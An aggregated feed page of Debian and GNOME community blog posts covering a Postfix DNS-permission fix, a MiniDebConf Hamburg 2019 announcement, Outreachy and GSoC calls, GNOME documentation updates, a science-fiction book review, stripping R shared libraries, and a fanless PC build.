smtpd_tls_cert_file = /etc/pki/tls/certs/tormento.olea.org.crt.pem
smtpd_tls_key_file = /etc/pki/tls/private/tormento.olea.org.key.pem
smtpd_tls_loglevel = 1
smtpd_tls_mandatory_protocols = TLSv1
smtpd_tls_received_header = yes
smtpd_tls_security_level = may
smtpd_tls_session_cache_timeout = 3600s
tls_random_source = dev:/dev/urandom
transport_maps = hash:/etc/postfix/transport
unknown_local_recipient_reject_code = 550
virtual_maps = hash:/etc/postfix/virtual

and my master.cf:

$ postconf -M
smtp        inet  n  -  n  -      -  smtpd
submission  inet  n  -  n  -      -  smtpd -o smtpd_tls_security_level=may -o smtpd_sasl_auth_enable=yes -o cleanup_service_name=cleanup_submission -o content_filter=smtp-amavis:[127.0.0.1]:10023
smtps       inet  n  -  n  -      -  smtpd -o smtpd_tls_wrappermode=yes -o smtpd_sasl_auth_enable=yes
pickup      unix  n  -  n  60     1  pickup
cleanup     unix  n  -  n  -      0  cleanup
qmgr        unix  n  -  n  300    1  qmgr
tlsmgr      unix  -  -  n  1000?  1  tlsmgr
rewrite     unix  -  -  n  -      -  trivial-rewrite
bounce      unix  -  -  n  -      0  bounce
defer       unix  -  -  n  -      0  bounce
trace       unix  -  -  n  -      0  bounce
verify      unix  -  -  n  -      1  verify
flush       unix  n  -  n  1000?  0  flush
proxymap    unix  -  -  n  -      -  proxymap
proxywrite  unix  -  -  n  -      1  proxymap
smtp        unix  -  -  n  -      -  smtp
relay       unix  -  -  n  -      -  smtp -o fallback_relay=
showq       unix  n  -  n  -      -  showq
error       unix  -  -  n  -      -  error
retry       unix  -  -  n  -      -  error
discard     unix  -  -  n  -      -  discard
local       unix  -  n  n  -      -  local
virtual     unix  -  n  n  -      -  virtual
lmtp        unix  -  -  n  -      -  lmtp
anvil       unix  -  -  n  -      1  anvil
scache      unix  -  -  n  -      1  scache
smtp-amavis unix  -  -  n  -      2  smtp -o smtp_data_done_timeout=1200 -o smtp_send_xforward_command=yes -o disable_dns_lookups=yes -o max_use=20
127.0.0.1:10025 inet n - n -      -  smtpd -o content_filter= -o local_recipient_maps= -o relay_recipient_maps= -o smtpd_restriction_classes= -o smtpd_delay_reject=no -o smtpd_client_restrictions=permit_mynetworks,reject -o smtpd_helo_restrictions= -o smtpd_sender_restrictions= -o smtpd_recipient_restrictions=permit_mynetworks,reject -o mynetworks_style=host -o mynetworks=127.0.0.0/8 -o strict_rfc821_envelopes=yes -o smtpd_error_sleep_time=0 -o smtpd_soft_error_limit=1001 -o smtpd_hard_error_limit=1000 -o smtpd_client_connection_count_limit=0 -o smtpd_client_connection_rate_limit=0 -o receive_override_options=no_header_body_checks,no_unknown_recipient_checks
policy      unix  -  n  n  -      2  spawn user=nobody argv=/usr/bin/perl /usr/share/postfix/policyd-spf-perl

I fear I’m missing something really obvious, but I’ve been googling for two days, doing any amount of tests, and now I don’t know what more to do.

Thanks in advance.

Postscript:

Well, this is embarrassing. As I predicted, my problem was caused by the most obvious and trivial reason: lack of read access to /etc/resolv.conf for the postfix user o_0

As you probably know, the Postfix subprocesses (smtp, smtpd, qmgr, etc.) run as the postfix user. All the comments and suggestions I’ve received have been related to problems accessing DNS resolver data, and the usual suspects have been SELinux or a chrooted Postfix. You all were right about the final reason. Following a piece of advice, I tried:

# sudo -u postfix -H cat /etc/resolv.conf
cat: /etc/resolv.conf: Permission denied

So… What??

# ls -l /etc/resolv.conf
-rw-r-----. 1 root named 118 mar 28 20:34 /etc/resolv.conf

OMG!… then after a chmod o+r and restarting Postfix, all the email on hold could be processed and sent, and new mail is processed as expected.

I doubt I changed the resolv.conf read permissions, but I can’t be 100% sure. So finally the problem is fixed, and I’m very sorry for stealing the attention of all of you for this ridiculous reason.

Thank you all.

Holger Levsen: 20190328-mini-debconf-hamburg-2019

Planet Debian - Thu, 28/03/2019 - 12:21pm
Registration now open for the Mini-DebConf in Hamburg in June 2019

Moin!

With great joy we are finally officially announcing the Debian MiniDebConf which will take place in Hamburg (Germany) from June 5 to 9, with three days of DebCamp-style hacking, followed by two days of talks, workshops and more hacking. And then, Monday the 10th is also a holiday in Germany (and some other countries), so you might choose to extend your stay by a day! (Though there will not be an official schedule for the 10th.)

TL;DR: We're having a MiniDebConf 2019 in Hamburg on June 5-9. It's going to be awesome. You should all come! Register now!

We tried to cut the longer version below a bit shorter and rely more on the wiki. If some information is missing, please reply to this email and we'll fix it.

Registration

Please register now; registration is free and open until May 23rd.

In order to register, add your name and details to the registration page in the Debian wiki.

There's space for approximately 150 people, due to the limited size of the main auditorium.

Please register ASAP, as we need this information for planning food and for sizing the hacking space.

Talks wanted (CfP)

We have assembled a content team (consisting of Michael Banck and Lee Garrett), who will soon publish a separate post with the CfP. You don't need to wait for that, though, and can already send your proposals to

cfp@minidebconfhamburg.debian.net

We will have talks on Saturday and Sunday, the exact slots are yet to be determined by the content team.

We expect submissions and talks to be held in English, as this is the working language in Debian and at this event.

Debian Sprints

The MiniDebCamp from Wednesday to Friday is a perfect opportunity to host Debian sprints. We would welcome it if teams assembled and worked together on their projects.

Sponsors wanted

Making a Mini DebConf happen costs money: we need to rent the venue and video gear, we hope to pay hard-working volunteers' lunch and dinner, we will probably sponsor some travel costs, and, last but not least, we want to print T-shirts.

We very much appreciate companies willing to support Debian through this meeting!

We have three sponsor categories:

  • 1000€ = sponsor, listed as such in all material and on the t-shirts.

  • 2500€ = gold sponsor, listed as such in all material & shirts, logo featured in the videos.

  • 5000€ = platinum sponsor, listed as such prominently in all material & shirts, logo featured prominently in the videos

Plus, there's corporate registration as an option too, where we will charge you 250€ for the registration. Please contact us if you are interested in that!

Location

The event will be hosted in the Victoria Kaserne (also called Fux or Frappant), which is a collective art space located in a historical monument. It is located between S-Altona and S-Holstenstraße, so there is a direct subway connection to/from the Hamburg Airport (HAM) and Altona is also a long distance train station.

There's a Gigabit-Fiber uplink connection and wireless coverage basically everywhere in the venue and in the outside areas.

More information about the venue is provided in the wiki.

Accommodation

The Mini-DebConf will take place in the center of Hamburg, so there are many accommodation options available. Some suggestions for housing options are given in the wiki, and you might want to share your findings there too.

There is also limited on-site accommodation available; please send a mail to holger@d.o if you'd like to stay on site.

More volunteers wanted

Some things still need more helping hands:

We need some volunteers for frontdesk duties, which mostly means being at the venue in the morning before things start (though, if possible, the frontdesk should be staffed throughout the day) and helping people find their way.

We also need more video volunteers. We know the gear will arrive, together with a person who knows how to operate it, but that's it. Please consider helping to make sure we'll have videos released! (And hopefully streams too.)

In general, if you notice something to improve, try to be the change you want to see.

Contact

If you want to help, need help, have comments or want to contact us for other reasons, there are several ways:

  • the irc channel #debconf-hamburg on irc.debian.org
  • the mailing list debian-events-eu@lists.debian.org
  • editing the wiki page which will notify us

Looking forward to seeing you in Hamburg!


Holger, for the 2019 Mini DebConf Hamburg team

Bits from Debian: Debian is welcoming applicants for Outreachy and GSoC 2019

Planet Debian - Thu, 28/03/2019 - 12:15pm

Debian is dedicated to increasing the diversity of contributors to the project and improving the inclusivity of the project. We strongly believe working towards these goals provides benefits both for people from backgrounds that are currently under-represented in free software, and for the wider movement, by increasing the range of skills, experiences and viewpoints contributing to it.

As part of this outreach effort, Debian is participating in the next round of Outreachy.

The application period for the May 2019 to August 2019 round has been extended until April 2, and Debian offers the following projects:

Outreachy invites applicants who are women (both cis and trans), trans men, and genderqueer people to apply. Anyone who faces systemic bias or discrimination in the technology industry of their country is also invited to apply.

Don't wait! You can learn more details on how to submit your application or get help in our wiki page for Outreachy and the Outreachy website.

Debian is also participating in the Google Summer of Code (GSoC) with eight projects, and the student application period is open until April 9.

You can learn more details on how to submit your GSoC application or get help in our wiki page for GSoC and the Google Summer of Code website.

We encourage people who are eligible for Outreachy and GSoC to submit their application to both programs.

Andre Klapper: Updating some GNOME 3.32 user documentation

Planet GNOME - Thu, 28/03/2019 - 4:51am

Apart from replacing many broken links to git.gnome.org or replacing links to GNOME Bugzilla with links to GNOME Gitlab in many code repositories and wiki pages, in the last months I spent some good time updating random GNOME user docs all over the place:

  • The user docs for Rhythmbox 3.4.3, GNOME Chess 3.32, five-or-more 3.32 and four-in-a-row 3.32 should be up-to-date.
  • The Totem 3.32 user documentation is up-to-date and now in Mallard format, based on work started in 2013 by Magda and Kat.
  • The screenshots in the user help of gnome-klotski, simple-scan, swell-foop, tali, and zenity are up-to-date.
  • Hopefully updated all the places which mentioned an application menu that is now replaced by a menu button.
  • Removed a bunch of unused help images which some repositories shipped for no reason, bloating tarballs.

Enjoy and check the GNOME Wiki if you are interested in working on user documentation!

Russ Allbery: Review: Caliban's War

Planet Debian - Thu, 28/03/2019 - 4:44am

Review: Caliban's War, by James S.A. Corey

Series: The Expanse #2
Publisher: Orbit
Copyright: June 2012
ISBN: 0-316-20227-4
Format: Kindle
Pages: 594

Caliban's War is the sequel to Leviathan Wakes and the second book in the Expanse series. This is the sort of series that has an over-arching, long-term plot line with major developments in each book, so it's unfortunately easy to be spoiled by reading anything about later volumes of the series. (I'm usually reasonably good at avoiding spoilers, but still know a bit more than I want about subsequent developments.) I'm going to try to keep this review relatively free of spoilers, but even discussion of characters gives a few things away. If you want to stay entirely unspoiled, you may not want to read this.

Also, as that probably makes obvious, there's little point in reading this series out of order, although the authors do a reasonably good job filling in the events of the previous book. (James S.A. Corey is a pseudonym for the writing team of Daniel Abraham and Ty Franck.) I still resorted to reading the Wikipedia plot summary, though, since it had been years since I read the first book.

Caliban's War opens on Ganymede, a year and a half after the events of Leviathan Wakes. Thanks to its magnetosphere, Ganymede enjoys rare protection from Jupiter's radiation field. Thanks to meticulously-engineered solar arrays, it is the bread basket of the outer solar system. That's before an inhuman creature attacks a unit of Earth and then Martian soldiers, killing all but one of them and sparking an orbital battle between Mars and Earth that destroys much of Ganymede's fragile human ecosystem. Ganymede's collapse is the first problem: a humanitarian catastrophe. The second problem is the attacking creature, which may be a new destabilizing weapon and may be some new twist on the threat of Leviathan Wakes. And the third problem is Venus, where incomprehensible things are happening that casually violate the known laws of physics.

James Holden returns to play a similar role as he did in Leviathan Wakes: the excessively idealistic pain in the ass who tends to blow open everyone's carefully-managed political machinations. Unfortunately, I think this worked much less well in this book. Holden has a crisis of conscience and spends rather a lot of the book being whiny and angstful, which I found more irritating than entertaining. I think it was an attempt at showing some deeper nuance in his relationships with his crew, but it didn't work for me.

The new character around whom the plot revolves is Prax, a botanist whose daughter is mysteriously kidnapped in the prelude of the book. (Apparently it can't be an Expanse novel without a kidnapped girl or woman.) He's unfortunately more of a plot device than a person for most of the story. One complaint I have about this book is that the opening chapters on Ganymede drag on for much longer than I'd prefer, while running Prax through the wringer and not revealing much about the plot. This is another nearly 600 page book; I think it would have been a tighter, sharper book if it were shorter.

That said, the other two new viewpoint characters, Bobbie and Avasarala, make up for a lot.

Avasarala is an apparently undistinguished member of the UN Earth government who has rather more power than her position indicates because she's extremely good at political maneuvering. I loved her within twenty pages of when she was introduced, and kept being delighted by her for the whole book. One of my favorite tropes in fiction is watching highly competent people be highly competent, and it's even better when they have engagingly blunt personalities. Avasarala is by turns grandmotherly and ruthless, polite and foul-mouthed, and grumpy and kind. Even on her own, she's great; when she crosses paths with Bobbie, the one surviving Martian marine from the initial attack who gets tangled in the resulting politics, something wonderful happens. Bobbie's principled and straightforward honesty is the perfect foil for Avasarala's strategic politics. Those sections are by far the best part of this book.

I think this is a somewhat weaker book than Leviathan Wakes. It starts slow and bogs down a bit in the middle with Holden's angst and relationship problems. But Avasarala is wonderful and makes everything better and gets plenty of viewpoint chapters, as does Bobbie who becomes both a lens through which to see more of Avasarala and a believable and sympathetic character in her own right. The main plot of the series does move forward somewhat, but this feels like mostly side story and stage setting. If you enjoyed Leviathan Wakes, though, I think you'll enjoy this, for Avasarala and Bobbie if nothing else.

Caliban's War satisfactorily closes out its own plot arc, but it introduces a substantial cliff-hanger in the last pages as setup for the next book in the series.

Followed by Abaddon's Gate in the novel sense. There is a novella, Gods of Risk, set between this book and Abaddon's Gate, but it's optional reading.

Rating: 7 out of 10

Dirk Eddelbuettel: #21: A Third and Final (?) Post on Stripping R Libraries

Planet Debian - Enj, 28/03/2019 - 3:31pd

Welcome to the 21st post in the reasonably relevant R ramblings series, or R4 for short.

Back in August of 2017, we wrote two posts, #9: Compacting your Shared Libraries and #10: Compacting your Shared Libraries, After The Build, about “stripping” shared libraries. This involves removing auxiliary information (such as debug symbols and more) from the shared libraries, which can greatly reduce the installed size on suitable platforms (it mostly matters where I work, i.e. on Linux). As an illustration we included this chart:

Chart from August 2017 post
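
To try this by hand outside of R, the same effect can be had with strip from binutils; a minimal sketch, where the path to the package’s shared object is purely illustrative:

ls -l mypkg/libs/mypkg.so                 # note the size before
strip --strip-debug mypkg/libs/mypkg.so   # remove the debug sections in place
ls -l mypkg/libs/mypkg.so                 # size after, typically much smaller

The --strip-debug option removes only the debugging sections; the dynamic symbols the loader needs are left alone.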

Two items this week made me think of these posts. The first was that a few days ago I noticed the following src/Makefile in the precrec package, which I had started to use more:

# copied from https://github.com/vinecopulib/rvinecopulib
# strip debug symbols for smaller Linux binaries
strippedLib: $(SHLIB)
	if test -e "/usr/bin/strip" && test -e "/bin/uname" && [[ `uname` == "Linux" ]] ; \
	then /usr/bin/strip --strip-debug $(SHLIB); fi
.phony: strippedLib

And lo and behold, the quoted package rvinecopulib has the same:

CXX_STD = CXX11
PKG_CPPFLAGS = -I../inst/include -pthread

# strip debug symbols for smaller Linux binaries
strippedLib: $(SHLIB)
	if test -e "/usr/bin/strip" && test -e "/bin/uname" && [[ `uname` == "Linux" ]] ; \
	then /usr/bin/strip --strip-debug $(SHLIB); fi
.phony: strippedLib

I was intrigued and googled a little. To my surprise I found one related reference … in a stone-old src/Makevars of mine in RcppClassic and probably written in 2007 or 2008. But more astonishing, the actual reference to the “phony target” trick is in … the #9 post from August 2017 referenced above. Doh. Younger me knew this, current me did not, and as those two packages didn’t reference my earlier use I had to re-find it. Oh well.

But the topic is still a very important one. The two blog posts show how to deal with this locally, both as a user and “consumer” of packages and as an admin of a system with such packages, as well as via the “phony target” trick as a producer of packages. Personally I had been using this trick since August 2017 via my ~/.R/Makevars.
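
For completeness, a minimal sketch of what such a ~/.R/Makevars entry can look like, simply mirroring the phony-target snippet quoted above (recipe lines in Makefiles must be indented with a tab):

# strip debug symbols for smaller Linux binaries
strippedLib: $(SHLIB)
	if test -e "/usr/bin/strip" && test -e "/bin/uname" && [[ `uname` == "Linux" ]] ; \
	then /usr/bin/strip --strip-debug $(SHLIB); fi
.phony: strippedLib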

And we were still missing such a tool for more general deployment. Well, until today, or rather, until R 3.6.0 comes out officially on April 26. The (excellent) R-devel Daily ‘NEWS’ feed – which itself was the topic of post #3: Follow R-devel – will likely show something tomorrow about this commit I spotted by following Winston’s mirror of the R-devel sources:

Part of ‘strip on install’ commit

And indeed, we can now do this with R-devel (rebuilt from today’s sources):

edd@rob:~$ RD CMD INSTALL --help | grep strip
      --strip		strip shared object(s)
edd@rob:~$

As a quick check, installing the (small, C-only) digest package without and with the --strip option gets us 425kb and 123kb, respectively. So the ratios from the chart above should now be achievable directly from R CMD INSTALL --strip with R 3.6.0. (And for what it is worth, the older tricks mentioned above still work as well.)
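
In command form the comparison amounts to something like the following sketch (the tarball name, including its version number, is illustrative):

RD CMD INSTALL digest_0.6.18.tar.gz           # shared object installs at about 425kb
RD CMD INSTALL --strip digest_0.6.18.tar.gz   # same shared object at about 123kb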

And as occupying disk space with unused debugging symbols is wasteful, the new extension to R CMD INSTALL is most welcome.

Last but not least: It is this type of relentless small improvements to R, its innards, its installations and support by R Core that make this system for Programming with Data such an excellent tool and joy to use and follow. A big Thank You! to R Core for all they do, and do quietly yet relentlessly. It is immensely appreciated.

Olav Vitters: New computer

Planet GNOME - Enj, 28/03/2019 - 12:50pd

Shortly after I assembled my current (now old) pc, the pc before it died. I intended to have two and ended up with only one: my NUC. With memory prices slowly dropping to more affordable levels, I decided to assemble a new pc. I tried to go for components with a good price/performance ratio; I don’t want to spend 50% more for maybe 10% more performance. Next to price/performance I opted for an AMD CPU, because Intel has had so many more security issues. I went with a 1TB SSD (SATA, because of price/performance), a 65W TDP AMD Ryzen with integrated GPU, a mini-ITX-sized motherboard with good 5.1+ sound, plus a fanless case. PSU-wise I found a laptop-like PSU/charger, which needed a DC-DC converter. The result is an utterly quiet pc. I did a stress test and checked the temperatures. Everything seems ok, though I wonder how things will be during summer. I quite like the lack of any noise.
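
For the curious, a minimal sketch of such a stress test and temperature check, assuming the stress-ng and lm-sensors packages are installed:

stress-ng --cpu 0 --timeout 10m &   # --cpu 0 loads all CPU cores, here for ten minutes
watch -n 5 sensors                  # re-read the temperature sensors every 5 seconds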
My existing older pc is a NUC with a slowly spinning fan. I noticed a company making fanless cases for pretty much all NUC models. I’m wondering whether to make my existing NUC fanless, or maybe do something else.

Installing Mageia was annoying. The latest stable release didn’t work, and the latest beta had the same problem. Eventually I ended up installing it over the internet (net install).

Before buying all the components I wasn’t aware that something fanless existed for such a CPU. It’s nice to do the research and build a pc which mostly follows the tips I found, my preferences, and the trade-offs I had to make. Price-wise I spent about 800 EUR on the various components (I didn’t list all of them). In case people want to know the exact components, I’ll put them into the comments (update: had to put it under the “more” link). I’m trying to avoid making this appear as an advertisement.

I’m going to link to a Dutch price comparison website for most items.

    • CPU: AMD Ryzen 5 2400G Boxed
      In Q2/Q3 2019 AMD will release newer Ryzen CPUs. I stopped caring about getting the latest each time.
    • Motherboard: ASRock Fatal1ty B450 Gaming-ITX/ac
    • Case: Streacom FC8 Alpha Fanless (without space for CD/DVD/Blueray reader)
    • Memory: G.Skill Aegis F4-3000C16D-32GISB
      This memory arrives without a heat sink. I bought two types of heat sinks from AliExpress. They’re still to arrive, so I haven’t listed them yet. A heat sink might not be needed, but I’d rather be careful.
    • SSD (M.2 format using SATA): Crucial MX500 m.2 1TB
    • Pico PSU: Mini-box picoPSU-150-XT
      I bought this for 42.50 EUR incl shipping; the current price is way higher. You’ll probably want to search around for better prices. I wasn’t sure whether to get the 150 Watt or the 120 Watt version. I noticed some people reporting stability problems with 120 Watt, though that could be due to heat instead of power. The integrated GPU can be power hungry; I doubt I’ll ever use something GPU intense.
    • Power supply: Leicke ULL PSU Power Supply 150W
      This is significantly cheaper on Amazon UK than Amazon DE. For me the UK one came with an EU power plug and was sent quickly from Germany. I was expecting to get a UK power plug and then use a spare ‘monitor’ cable to make it work.
    • Better thermal compound: ARCTIC MX-4 2019 Edition – 8 gram
      Use keepa.com plugin for your browser to compare the prices across Amazon sites. Amazon was cheaper than any price comparison site.
    • ATX 90 degree power adapter: Mainboard Motherboard ATX 24Pin to 24Pin 90 Degree Power Adapter Connector
      This bit hasn’t arrived yet. I added this to ensure there is more space between the memory and the pico psu (both sources of heat). Further, the internal USB3 cable from the case is very sturdy. Turning the pico psu 90 degrees will help with that internal USB3 cable, plus optimize heat dissipation.
    • Internal USB3 90 degree adapter: USB 3.0 20pin Male to Female Extension Adapter Angled 90 Degree for Motherboard Mainboard
      Similar to the ATX 90 degree adapter. This is solely meant for making it easier to connect that sturdy internal USB3 cable.
    • M.2 heatsink: Pure Copper Cooling M.2 NGFF 2260 Solid Hard Disk Cooler Heat Sink
      I wanted this due to remarks that a M.2 SSD could run quite hot, combined with the lack of airflow in the case (as it’s fanless). It’s only a few EUR and I wanted to be on the safe side.
      Note: It’s tiny! Despite being for M.2 it’s smaller (5cm wide) than expected. I’m still not entirely sure if it’s needed.


    General tips:

    • The power supply and the pico psu/DC-DC converter aren’t 100% efficient, meaning 150 Watt from the power supply will be less by the time it arrives at the pico psu, and less again by the time it arrives at the motherboard. On the other hand, power supplies are really inefficient if they’re underutilized, meaning that if you only run one at 50% load the power supply and converter will waste a lot of power. Also make sure the voltages all match: everything should accept the same voltage (12 or 19 Volt seems to be common).
    • AliExpress and Ebay have a lot of questionable Pico PSU/DC-DC converters. They’re cheap, but the reviews made me question buying those. I noticed a lot of sites reselling the AliExpress ones under various brands. Make sure to recognize those AliExpress ones. See for instance the ones sold by RGeek store.
    • I bought 20 grams of thermal paste because a) it has better heat transfer than the paste which came with the case and b) of a comment that there isn’t enough thermal paste with the case. The case came with (I think) 2x 10 grams. I’m pretty sure 8 grams would be enough, and I applied it generously. If you get a less power-hungry CPU then stick with the paste from the case; reading the specification, it’s pretty good as well. The spec showed 5 W/m·K; the one I have is around 8.5 W/m·K.
    • Another price comparison site I know: Geizhals.eu. I also used Google.
    • The Dutch Tweakers.net site allows you to add multiple products and then calculate the cheapest combination of shops including shipping costs (probably only works for .nl, .be). It also gives alternative shop combinations.
    • Fanless NUC cases: Akasa, which also has nice options for motherboards with Intel CPUs (it seems most of those motherboards have a fixed layout).
    • I wanted the pc to be small. My NUC is tiny; the new pc is still huge in comparison. You’re paying a significant premium to use small components. If you do not go for a mini-ITX-sized motherboard you can save a lot on the motherboard. Same for the fanless case; it’s also possible to use a quiet CPU cooler (e.g. Noctua NH-L9a-AM4). The fanless case plus PSU and so on was 200 EUR. There are cases for 40-50 EUR including PSU.
